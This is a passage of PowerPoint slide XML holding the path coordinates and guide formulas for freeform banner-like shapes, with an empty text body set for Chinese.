                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="44" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="602" y="102"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="602" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="558" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="572" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="585" y="119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613" y="87"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="93"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="102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lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1890">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Freeform 104"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="765917" y="3057101"/>
            <a:ext cx="2743676" cy="953871"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 618 w 620"/>
              <a:gd name="T1" fmla="*/ 72 h 185"/>
              <a:gd name="T2" fmla="*/ 587 w 620"/>
              <a:gd name="T3" fmla="*/ 35 h 185"/>
              <a:gd name="T4" fmla="*/ 565 w 620"/>
              <a:gd name="T5" fmla="*/ 18 h 185"/>
              <a:gd name="T6" fmla="*/ 598 w 620"/>
              <a:gd name="T7" fmla="*/ 95 h 185"/>
              <a:gd name="T8" fmla="*/ 560 w 620"/>
              <a:gd name="T9" fmla="*/ 152 h 185"/>
              <a:gd name="T10" fmla="*/ 492 w 620"/>
              <a:gd name="T11" fmla="*/ 168 h 185"/>
              <a:gd name="T12" fmla="*/ 338 w 620"/>
              <a:gd name="T13" fmla="*/ 168 h 185"/>
              <a:gd name="T14" fmla="*/ 144 w 620"/>
              <a:gd name="T15" fmla="*/ 164 h 185"/>
              <a:gd name="T16" fmla="*/ 37 w 620"/>
              <a:gd name="T17" fmla="*/ 170 h 185"/>
              <a:gd name="T18" fmla="*/ 279 w 620"/>
              <a:gd name="T19" fmla="*/ 168 h 185"/>
              <a:gd name="T20" fmla="*/ 413 w 620"/>
              <a:gd name="T21" fmla="*/ 171 h 185"/>
              <a:gd name="T22" fmla="*/ 516 w 620"/>
              <a:gd name="T23" fmla="*/ 171 h 185"/>
              <a:gd name="T24" fmla="*/ 543 w 620"/>
              <a:gd name="T25" fmla="*/ 170 h 185"/>
              <a:gd name="T26" fmla="*/ 549 w 620"/>
              <a:gd name="T27" fmla="*/ 170 h 185"/>
              <a:gd name="T28" fmla="*/ 408 w 620"/>
              <a:gd name="T29" fmla="*/ 178 h 185"/>
              <a:gd name="T30" fmla="*/ 267 w 620"/>
              <a:gd name="T31" fmla="*/ 182 h 185"/>
              <a:gd name="T32" fmla="*/ 132 w 620"/>
              <a:gd name="T33" fmla="*/ 179 h 185"/>
              <a:gd name="T34" fmla="*/ 13 w 620"/>
              <a:gd name="T35" fmla="*/ 181 h 185"/>
              <a:gd name="T36" fmla="*/ 2 w 620"/>
              <a:gd name="T37" fmla="*/ 177 h 185"/>
              <a:gd name="T38" fmla="*/ 9 w 620"/>
              <a:gd name="T39" fmla="*/ 159 h 185"/>
              <a:gd name="T40" fmla="*/ 66 w 620"/>
              <a:gd name="T41" fmla="*/ 102 h 185"/>
              <a:gd name="T42" fmla="*/ 48 w 620"/>
              <a:gd name="T43" fmla="*/ 60 h 185"/>
              <a:gd name="T44" fmla="*/ 56 w 620"/>
              <a:gd name="T45" fmla="*/ 17 h 185"/>
              <a:gd name="T46" fmla="*/ 194 w 620"/>
              <a:gd name="T47" fmla="*/ 14 h 185"/>
              <a:gd name="T48" fmla="*/ 282 w 620"/>
              <a:gd name="T49" fmla="*/ 7 h 185"/>
              <a:gd name="T50" fmla="*/ 429 w 620"/>
              <a:gd name="T51" fmla="*/ 9 h 185"/>
              <a:gd name="T52" fmla="*/ 536 w 620"/>
              <a:gd name="T53" fmla="*/ 3 h 185"/>
              <a:gd name="T54" fmla="*/ 494 w 620"/>
              <a:gd name="T55" fmla="*/ 2 h 185"/>
              <a:gd name="T56" fmla="*/ 330 w 620"/>
              <a:gd name="T57" fmla="*/ 5 h 185"/>
              <a:gd name="T58" fmla="*/ 217 w 620"/>
              <a:gd name="T59" fmla="*/ 9 h 185"/>
              <a:gd name="T60" fmla="*/ 78 w 620"/>
              <a:gd name="T61" fmla="*/ 10 h 185"/>
              <a:gd name="T62" fmla="*/ 26 w 620"/>
              <a:gd name="T63" fmla="*/ 21 h 185"/>
              <a:gd name="T64" fmla="*/ 23 w 620"/>
              <a:gd name="T65" fmla="*/ 20 h 185"/>
              <a:gd name="T66" fmla="*/ 19 w 620"/>
              <a:gd name="T67" fmla="*/ 32 h 185"/>
              <a:gd name="T68" fmla="*/ 27 w 620"/>
              <a:gd name="T69" fmla="*/ 51 h 185"/>
              <a:gd name="T70" fmla="*/ 56 w 620"/>
              <a:gd name="T71" fmla="*/ 100 h 185"/>
              <a:gd name="T72" fmla="*/ 11 w 620"/>
              <a:gd name="T73" fmla="*/ 153 h 185"/>
              <a:gd name="T74" fmla="*/ 0 w 620"/>
              <a:gd name="T75" fmla="*/ 173 h 185"/>
              <a:gd name="T76" fmla="*/ 0 w 620"/>
              <a:gd name="T77" fmla="*/ 185 h 185"/>
              <a:gd name="T78" fmla="*/ 7 w 620"/>
              <a:gd name="T79" fmla="*/ 182 h 185"/>
              <a:gd name="T80" fmla="*/ 97 w 620"/>
              <a:gd name="T81" fmla="*/ 181 h 185"/>
              <a:gd name="T82" fmla="*/ 231 w 620"/>
              <a:gd name="T83" fmla="*/ 185 h 185"/>
              <a:gd name="T84" fmla="*/ 370 w 620"/>
              <a:gd name="T85" fmla="*/ 184 h 185"/>
              <a:gd name="T86" fmla="*/ 549 w 620"/>
              <a:gd name="T87" fmla="*/ 181 h 185"/>
              <a:gd name="T88" fmla="*/ 557 w 620"/>
              <a:gd name="T89" fmla="*/ 171 h 185"/>
              <a:gd name="T90" fmla="*/ 611 w 620"/>
              <a:gd name="T91" fmla="*/ 94 h 185"/>
              <a:gd name="T92" fmla="*/ 620 w 620"/>
              <a:gd name="T93" fmla="*/ 82 h 185"/>
              <a:gd name="T94" fmla="*/ 44 w 620"/>
              <a:gd name="T95" fmla="*/ 76 h 185"/>
              <a:gd name="T96" fmla="*/ 26 w 620"/>
              <a:gd name="T97" fmla="*/ 35 h 185"/>
              <a:gd name="T98" fmla="*/ 24 w 620"/>
              <a:gd name="T99" fmla="*/ 24 h 185"/>
              <a:gd name="T100" fmla="*/ 60 w 620"/>
              <a:gd name="T101" fmla="*/ 94 h 185"/>
              <a:gd name="T102" fmla="*/ 59 w 620"/>
              <a:gd name="T103" fmla="*/ 105 h 185"/>
              <a:gd name="T104" fmla="*/ 602 w 620"/>
              <a:gd name="T105" fmla="*/ 102 h 185"/>
              <a:gd name="T106" fmla="*/ 552 w 620"/>
              <a:gd name="T107" fmla="*/ 173 h 185"/>
              <a:gd name="T108" fmla="*/ 558 w 620"/>
              <a:gd name="T109" fmla="*/ 164 h 185"/>
              <a:gd name="T110" fmla="*/ 553 w 620"/>
              <a:gd name="T111" fmla="*/ 163 h 185"/>
              <a:gd name="T112" fmla="*/ 553 w 620"/>
              <a:gd name="T113" fmla="*/ 163 h 185"/>
              <a:gd name="T114" fmla="*/ 607 w 620"/>
              <a:gd name="T115" fmla="*/ 89 h 185"/>
              <a:gd name="T116" fmla="*/ 616 w 620"/>
              <a:gd name="T117" fmla="*/ 83 h 185"/>
              <a:gd name="T118" fmla="*/ 602 w 620"/>
              <a:gd name="T119" fmla="*/ 102 h 18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620" h="185">
                <a:moveTo>
                  <a:pt x="620" y="80"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618" y="72"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="602" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="569" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="552" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="580" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="597" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598" y="95"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="582" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="574" y="128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="565" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="560" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="507" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="419" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="338" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="322" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="286" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144" y="164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="136" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="381" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="413" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="516" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="545" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="543" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="408" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="374" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="302" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="166" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="170"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="79"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="429" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="536" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="330" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="296" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42" y="120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="178"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="130" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163" y="182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="298" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="333" y="185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370" y="184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="514" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="549" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="557" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563" y="163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587" y="127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="619" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="83"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="82"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="620" y="80"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="44" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60" y="94"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58" y="97"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="602" y="102"/>
                </a:moveTo>
                <a:lnTo>
